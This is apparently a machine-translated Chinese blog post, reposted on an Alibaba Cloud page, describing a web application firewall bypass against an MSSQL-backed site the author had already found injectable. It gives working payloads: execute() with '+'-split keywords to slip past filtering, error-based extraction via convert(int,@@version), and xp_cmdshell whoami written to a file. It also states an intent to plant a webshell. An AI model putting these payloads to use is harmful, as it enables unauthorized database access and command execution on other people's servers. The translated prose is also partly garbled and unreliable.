MSSQL WAF Bypass (2)

Source: Internet
Author: User
Tags mssql

0x00 Preface

The last bypass was too simple to be able to draw data or get permission, this time continue to bypass, get the data

0x01 process

Or the last site, simple judgment, presence injected

Find and number, exec, union Select, select Number ... Be filtered

found that the Execute function was not filtered and the dog did not show that the function could be used

execute(‘sql语句‘)  //execute函数中可以写sql语句,且为字符串,那么就可以传入一些变形字符串来绕过waf

Verify it locally.

Some variants

Just this time using SQL Server stack injection, and will not show the data on the page, so let this time stacking error, to achieve the effect of error injection

execute(‘select convert(int,@@version)‘) --a

Of course it needs to be deformed, otherwise it will be intercepted because a select

execute(‘sel‘%2b‘ect convert(int,@@version)‘) --a   //在url编码中 %2b 等价与 + 所以可以理解为 ‘sel‘ + ‘ect‘

By using the Execute function, you can deform to make the WAF impossible to intercept, get the data, or execute the SQL statement, which makes it much easier.
Execute Cmdshell, because Cmdshell cannot be echoed by error, but can redirect the results to a file or write to a table

execute(‘master..xp_cmdshell whoami > e:\‘%2b‘\xx\‘%2b‘\1.txt‘)  // 双斜杠被过滤

Returning an error does not matter, WAF does not intercept, see if 1.txt has data

0x02 Follow-up

Would like to write to Webshell or download Webshell through the public network, but the server can not go out of the network, and there is a WAF, resulting in the write shell failure, consider to kill the WAF, but also to avoid the impact on the server.

MSSQL WAF Bypass (2)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.